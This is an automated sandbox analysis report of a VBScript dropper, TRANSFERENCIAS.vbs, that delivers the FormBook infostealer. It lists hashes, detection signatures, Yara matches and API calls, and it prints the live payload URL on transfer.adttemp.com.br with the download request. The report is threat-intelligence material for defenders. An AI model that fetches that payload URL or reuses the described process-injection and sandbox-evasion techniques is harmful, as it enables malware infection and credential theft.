Windows Analysis Report
TRANSFERENCIAS.vbs

Overview

General Information

Sample name: TRANSFERENCIAS.vbs
Analysis ID: 1525551
MD5: 36785fe79d41b73fae95c26d6f64186d
SHA1: 9a2d9296673086220e25c622c059ba1a7b65dd89
SHA256: 434e6d3b448f48a98ef5dc955d51c05b8e136c40fda5f6b8cff698eab989ad07
Tags: vbsuser-abuse_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for domain / URL
Source: transfer.adttemp.com.br Virustotal: Detection: 5% Perma Link
Source: http://transfer.adttemp.com.br Virustotal: Detection: 5% Perma Link
Yara detected FormBook
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.1324624644.000002387ED7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318550574.000002387ED7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1319390729.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318437273.000002387EA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1324207380.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318568461.000002387EA8C000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking
barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /qbDh2/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /qbDh2/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://transfer.adttemp.com.brd
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://transfer.adttemp.com.br
Source: wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe, 00000008.00000002.1315543440.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe.0.dr String found in binary or memory: https://transfer.adttemp.com.br/qbDh2/sirdeeeeee.txt
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.7:49700 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0042C563 NtClose, 10_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F335C0 NtCreateMutant,LdrInitializeThunk, 10_2_02F335C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_02F32C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_02F32DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F34340 NtSetContextThread, 10_2_02F34340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33090 NtSetValueKey, 10_2_02F33090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33010 NtOpenDirectoryObject, 10_2_02F33010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F34650 NtSuspendThread, 10_2_02F34650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32AF0 NtWriteFile, 10_2_02F32AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32AD0 NtReadFile, 10_2_02F32AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32AB0 NtWaitForSingleObject, 10_2_02F32AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32BF0 NtAllocateVirtualMemory, 10_2_02F32BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32BE0 NtQueryValueKey, 10_2_02F32BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32BA0 NtEnumerateValueKey, 10_2_02F32BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32B80 NtQueryInformationFile, 10_2_02F32B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32B60 NtClose, 10_2_02F32B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F339B0 NtGetContextThread, 10_2_02F339B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32EE0 NtQueueApcThread, 10_2_02F32EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32EA0 NtAdjustPrivilegesToken, 10_2_02F32EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32E80 NtReadVirtualMemory, 10_2_02F32E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32E30 NtWriteVirtualMemory, 10_2_02F32E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32FE0 NtCreateFile, 10_2_02F32FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32FB0 NtResumeThread, 10_2_02F32FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32FA0 NtQuerySection, 10_2_02F32FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32F90 NtProtectVirtualMemory, 10_2_02F32F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32F60 NtCreateProcessEx, 10_2_02F32F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32F30 NtCreateSection, 10_2_02F32F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32CF0 NtOpenProcess, 10_2_02F32CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32CC0 NtQueryVirtualMemory, 10_2_02F32CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32CA0 NtQueryInformationToken, 10_2_02F32CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32C60 NtCreateKey, 10_2_02F32C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32C00 NtQueryInformationProcess, 10_2_02F32C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32DD0 NtDelayExecution, 10_2_02F32DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32DB0 NtEnumerateKey, 10_2_02F32DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33D70 NtOpenThread, 10_2_02F33D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32D30 NtUnmapViewOfSection, 10_2_02F32D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32D10 NtMapViewOfSection, 10_2_02F32D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33D10 NtOpenProcessToken, 10_2_02F33D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32D00 NtSetInformationFile, 10_2_02F32D00
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 8_2_013C1930 8_2_013C1930
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 8_2_013C3558 8_2_013C3558
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 8_2_013C354A 8_2_013C354A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00402350 10_2_00402350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0042EB83 10_2_0042EB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040FCFB 10_2_0040FCFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00404486 10_2_00404486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040FD03 10_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00402E60 10_2_00402E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004166B3 10_2_004166B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040FF23 10_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040DFA3 10_2_0040DFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E3F0 10_2_02F0E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC03E6 10_2_02FC03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F4739A 10_2_02F4739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED34C 10_2_02EED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBA352 10_2_02FBA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB132D 10_2_02FB132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB70E9 10_2_02FB70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBF0E0 10_2_02FBF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF0CC 10_2_02FAF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB81CC 10_2_02FB81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0B1B0 10_2_02F0B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC01AA 10_2_02FC01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FCB16B 10_2_02FCB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF172 10_2_02EEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F3516C 10_2_02F3516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F88158 10_2_02F88158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9A118 10_2_02F9A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF0100 10_2_02EF0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1C6E0 10_2_02F1C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB16CC 10_2_02FB16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFC7C0 10_2_02EFC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBF7B0 10_2_02FBF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F24750 10_2_02F24750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAE4F6 10_2_02FAE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF1460 10_2_02EF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB2446 10_2_02FB2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBF43F 10_2_02FBF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9D5B0 10_2_02F9D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC0591 10_2_02FC0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB7571 10_2_02FB7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00535 10_2_02F00535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FADAC6 10_2_02FADAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F45AA0 10_2_02F45AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9DAAC 10_2_02F9DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFEA80 10_2_02EFEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F73A6C 10_2_02F73A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBFA49 10_2_02FBFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB7A46 10_2_02FB7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F75BF0 10_2_02F75BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F3DBF9 10_2_02F3DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB6BD7 10_2_02FB6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1FB80 10_2_02F1FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBFB76 10_2_02FBFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBAB40 10_2_02FBAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2E8F0 10_2_02F2E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F038E0 10_2_02F038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE68B8 10_2_02EE68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F02840 10_2_02F02840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0A840 10_2_02F0A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D800 10_2_02F6D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F029A0 10_2_02F029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FCA9A6 10_2_02FCA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F16962 10_2_02F16962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F09950 10_2_02F09950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B950 10_2_02F1B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBEEDB 10_2_02FBEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F09EB0 10_2_02F09EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F12E90 10_2_02F12E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBCE93 10_2_02FBCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00E59 10_2_02F00E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBEE26 10_2_02FBEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0CFE0 10_2_02F0CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF2FC8 10_2_02EF2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBFFB1 10_2_02FBFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7EFA0 10_2_02F7EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01F92 10_2_02F01F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F74F40 10_2_02F74F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F20F30 10_2_02F20F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F42F28 10_2_02F42F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBFF09 10_2_02FBFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBFCF2 10_2_02FBFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF0CF2 10_2_02EF0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0CB5 10_2_02FA0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F79C32 10_2_02F79C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00C00 10_2_02F00C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFADE0 10_2_02EFADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1FDC0 10_2_02F1FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F18DBF 10_2_02F18DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB7D73 10_2_02FB7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB1D5A 10_2_02FB1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F03D40 10_2_02F03D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0AD00 10_2_02F0AD00
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02F35130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02F47E54 appears 96 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02EEB970 appears 265 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02F7F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02F6EA12 appears 86 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: TRANSFERENCIAS.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
